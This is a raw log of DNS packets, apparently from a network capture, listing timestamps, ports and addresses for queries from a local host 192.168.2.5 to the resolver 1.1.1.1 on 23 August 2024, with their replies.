Aug 23, 2024 18:42:49.207613945 CEST	50271	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.207747936 CEST	53	56452	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.207803011 CEST	57264	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.207953930 CEST	62843	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.208010912 CEST	55341	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.208144903 CEST	56676	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.208368063 CEST	56171	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.208775997 CEST	55365	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.209197044 CEST	55948	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.209444046 CEST	56145	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.209664106 CEST	61827	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.209976912 CEST	63950	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.210165024 CEST	65201	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:49.210813046 CEST	53	61805	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.216212034 CEST	53	62809	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.216840029 CEST	53	55920	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.217536926 CEST	53	55341	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.217957973 CEST	53	50116	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.217968941 CEST	53	57221	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.218579054 CEST	53	55365	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.218640089 CEST	53	56676	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.219434023 CEST	53	57264	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.221354961 CEST	53	53215	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.225377083 CEST	53	61827	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.228478909 CEST	53	63950	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.229526997 CEST	53	62290	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.230690002 CEST	53	64509	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.230710983 CEST	53	49898	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.240052938 CEST	53	50271	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.241903067 CEST	53	56171	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.243267059 CEST	53	63429	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.244477987 CEST	53	62270	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.269856930 CEST	53	63105	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.292596102 CEST	53	59710	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.316507101 CEST	53	57867	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.329531908 CEST	53	49657	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.335613012 CEST	53	56145	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.346672058 CEST	53	50791	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.404066086 CEST	53	55948	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.421329021 CEST	53	62843	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.726427078 CEST	53	64622	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:49.968385935 CEST	53	65201	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:50.119424105 CEST	57681	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:51.129838943 CEST	57681	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:51.144913912 CEST	53	57681	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:51.144925117 CEST	53	57681	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:51.144933939 CEST	53	57681	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.200515985 CEST	51284	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.200836897 CEST	65452	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.201383114 CEST	56041	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.201590061 CEST	65338	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.202078104 CEST	51687	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.202625036 CEST	64784	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.203556061 CEST	62246	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.204184055 CEST	59847	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.205132961 CEST	64200	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.205763102 CEST	55199	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.205959082 CEST	54142	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.206351042 CEST	64993	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.206528902 CEST	50316	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.207118034 CEST	58199	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.207382917 CEST	61694	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.207556009 CEST	61355	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.208324909 CEST	63084	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.208874941 CEST	58986	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.209177017 CEST	65277	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.209666967 CEST	64932	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.210869074 CEST	63568	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.211102962 CEST	52224	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.211385965 CEST	50667	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.211880922 CEST	50813	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.212336063 CEST	49332	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.212503910 CEST	55906	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.213705063 CEST	57566	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.214555979 CEST	63169	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.214905024 CEST	53	64784	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.215326071 CEST	53	62246	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.217475891 CEST	53	64200	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.218750000 CEST	53	55199	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.219741106 CEST	53	65277	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.219752073 CEST	53	61355	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.220108986 CEST	53	64993	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.220472097 CEST	53	63084	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.220758915 CEST	53	54142	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.221244097 CEST	53	58199	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.221556902 CEST	53	61694	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.221700907 CEST	53	52224	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.222450018 CEST	53	49332	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.224061966 CEST	53	57566	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.224071980 CEST	53	55906	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.224081039 CEST	53	50813	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.224226952 CEST	53	50316	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.239765882 CEST	53	59847	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.244261980 CEST	53	50667	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.247988939 CEST	53	58986	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.254086018 CEST	56764	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.280251026 CEST	57212	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.282011032 CEST	61701	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.283607006 CEST	62167	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.288049936 CEST	53	56764	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.295217991 CEST	53	62167	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.297449112 CEST	58502	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.297867060 CEST	63323	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.298736095 CEST	52517	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.299137115 CEST	63690	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.299751043 CEST	53038	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.300843000 CEST	52531	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.301290989 CEST	52043	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.301619053 CEST	60139	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.301809072 CEST	58020	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.301975965 CEST	65442	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.302428007 CEST	54338	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.302623034 CEST	62788	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.302999973 CEST	49515	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.303369045 CEST	49629	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.303899050 CEST	60354	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.304105997 CEST	50036	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.304652929 CEST	64617	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.304920912 CEST	50920	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.305445910 CEST	63446	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.307110071 CEST	53	52517	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.308768988 CEST	53	63323	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.309838057 CEST	53	63690	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.312160015 CEST	53	58020	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.312262058 CEST	53	60139	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.312504053 CEST	53	52043	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.313086033 CEST	53	57212	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.313697100 CEST	53	49515	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.314091921 CEST	53	49629	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.315191984 CEST	53	64617	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.316111088 CEST	53	63446	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.316239119 CEST	53	50920	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.316356897 CEST	53	50036	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.318319082 CEST	53	61701	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.337261915 CEST	53	52531	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.338258028 CEST	53	53038	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.338267088 CEST	53	60354	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.338375092 CEST	53	62788	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.338861942 CEST	53	65442	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.391102076 CEST	53531	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.391191959 CEST	64911	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.393625021 CEST	65527	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.394731045 CEST	60007	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.395315886 CEST	50986	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.395339012 CEST	62949	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.396102905 CEST	49764	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.396146059 CEST	51202	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.396343946 CEST	53	64932	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.396399975 CEST	51774	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.397092104 CEST	57409	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.397130966 CEST	65347	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.397313118 CEST	60774	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.397361040 CEST	53	51687	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.397921085 CEST	50017	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.398194075 CEST	58482	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.399410009 CEST	52379	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.401140928 CEST	65457	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.401487112 CEST	51092	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.402645111 CEST	53080	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.402971029 CEST	53572	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.403887987 CEST	56363	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.404298067 CEST	63448	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:57.404844046 CEST	53	65527	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.405297995 CEST	53	53531	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.406311035 CEST	53	60007	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.407485962 CEST	53	50986	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.407515049 CEST	53	58482	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.407548904 CEST	53	57409	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.409020901 CEST	53	62949	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.409198046 CEST	53	65347	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.409853935 CEST	53	50017	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.410005093 CEST	53	49764	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.411696911 CEST	53	53080	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.413846970 CEST	53	53572	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.414868116 CEST	53	63448	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.415116072 CEST	53	56363	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.425185919 CEST	53	65452	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.428054094 CEST	53	51774	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.429016113 CEST	53	51202	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.433739901 CEST	53	65457	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.434150934 CEST	53	51092	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.435077906 CEST	53	52379	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.462013006 CEST	53	56041	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.464169979 CEST	53	58502	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.473212957 CEST	53	54338	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.474153042 CEST	53	63169	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.547645092 CEST	53	64911	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.557955980 CEST	53	60774	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:57.986367941 CEST	53	65338	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:58.420078039 CEST	51284	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:58.420116901 CEST	63568	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:58.958283901 CEST	53	63568	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:58.958693981 CEST	53	63568	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:59.365026951 CEST	53	51284	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:59.365072966 CEST	53	51284	1.1.1.1	192.168.2.5
Aug 23, 2024 18:42:59.676784992 CEST	63568	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:42:59.685769081 CEST	53	63568	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.281461954 CEST	58069	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.282006979 CEST	62489	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.282232046 CEST	49225	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.282485008 CEST	55193	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.282972097 CEST	54640	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.283159971 CEST	65142	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.283443928 CEST	61263	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.283714056 CEST	52356	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.283915997 CEST	63132	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.284084082 CEST	63531	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.285747051 CEST	50035	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.295478106 CEST	53	65142	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.295907021 CEST	53	55193	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.296076059 CEST	53	49225	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.296787024 CEST	53	61263	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.299228907 CEST	53	52356	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.299571991 CEST	53	62489	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.300117016 CEST	53	50035	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.301704884 CEST	53	63132	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.316915035 CEST	53	58069	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.322272062 CEST	53	63531	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.373393059 CEST	54108	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.373394012 CEST	57180	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.373558998 CEST	54882	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.373728037 CEST	64132	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.373806953 CEST	61267	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.373980999 CEST	61206	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.374146938 CEST	54494	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.374631882 CEST	56202	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.374984026 CEST	53136	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.375257969 CEST	54217	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.375716925 CEST	51879	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.375884056 CEST	63771	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.376970053 CEST	65299	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.377491951 CEST	52882	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.378470898 CEST	50928	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.378916979 CEST	51733	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.379492998 CEST	52355	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.379996061 CEST	62959	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.380397081 CEST	57658	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.381162882 CEST	54664	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.381382942 CEST	58059	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.381731987 CEST	51018	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.381959915 CEST	49709	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.382508039 CEST	55801	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.382931948 CEST	56335	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.382947922 CEST	53	63771	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.383359909 CEST	56795	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.383416891 CEST	53	54882	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.383682013 CEST	50832	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.383923054 CEST	56163	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.384130955 CEST	52021	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.384551048 CEST	61874	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.384726048 CEST	62864	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.385001898 CEST	53	57180	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.385118008 CEST	49425	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.385313988 CEST	53	54217	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.385339975 CEST	54651	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.385572910 CEST	53	64132	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.385901928 CEST	54386	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.386202097 CEST	60186	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.386368036 CEST	53	53136	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.386698008 CEST	61397	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.387283087 CEST	52726	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.387460947 CEST	53	65299	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.387662888 CEST	57056	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.388015032 CEST	64515	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.388511896 CEST	58168	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.388727903 CEST	61052	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.389672041 CEST	65216	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.389905930 CEST	65369	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.390285969 CEST	53	51733	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.390325069 CEST	59567	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.390741110 CEST	53	56335	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.390825033 CEST	51233	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.391207933 CEST	57848	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.391472101 CEST	63453	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.391752005 CEST	54722	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.392309904 CEST	53	55801	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.392357111 CEST	54824	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.392720938 CEST	52731	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.392926931 CEST	58995	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.393532991 CEST	53	62959	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.393542051 CEST	53	51018	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.393546104 CEST	53	54664	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.393568993 CEST	51204	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.393815041 CEST	53	57658	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.394742012 CEST	53	61874	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.395313978 CEST	53	50832	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.395687103 CEST	53	56163	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.396065950 CEST	53	54651	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.397387028 CEST	53	54386	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.397917986 CEST	53	61397	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.398564100 CEST	53	52726	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.398739100 CEST	53	58168	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.400346041 CEST	53	65216	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.402647018 CEST	53	64515	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.404295921 CEST	53	59567	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.404511929 CEST	53	57848	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.406889915 CEST	53	54722	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.408399105 CEST	53	58995	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.409002066 CEST	53	61267	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.409012079 CEST	53	62864	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.409019947 CEST	53	56202	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.409091949 CEST	53	51879	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.409729958 CEST	53	61206	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.411637068 CEST	53	52355	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.414917946 CEST	53	50928	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.416955948 CEST	53	49425	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.417432070 CEST	53	52021	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.419847012 CEST	53	49709	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.424069881 CEST	53	57056	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.424078941 CEST	53	61052	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.426423073 CEST	53	63453	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.426470041 CEST	53	51204	1.1.1.1	192.168.2.5
Aug 23, 2024 18:43:03.452342987 CEST	65014	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.452822924 CEST	49698	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.452945948 CEST	49461	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.453327894 CEST	55157	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.453469992 CEST	64840	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.453685999 CEST	58671	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.454216957 CEST	51107	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.454335928 CEST	62838	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.456010103 CEST	55839	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.456274986 CEST	61138	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.456577063 CEST	60766	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.457055092 CEST	55072	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.457271099 CEST	62288	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.457551956 CEST	60219	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.457963943 CEST	53069	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.458268881 CEST	52581	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.458714008 CEST	49320	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.458937883 CEST	53515	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.459604979 CEST	55795	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.460618019 CEST	65498	53	192.168.2.5	1.1.1.1
Aug 23, 2024 18:43:03.460913897 CEST	53	49698	1.1.1.1	192.168.2.5
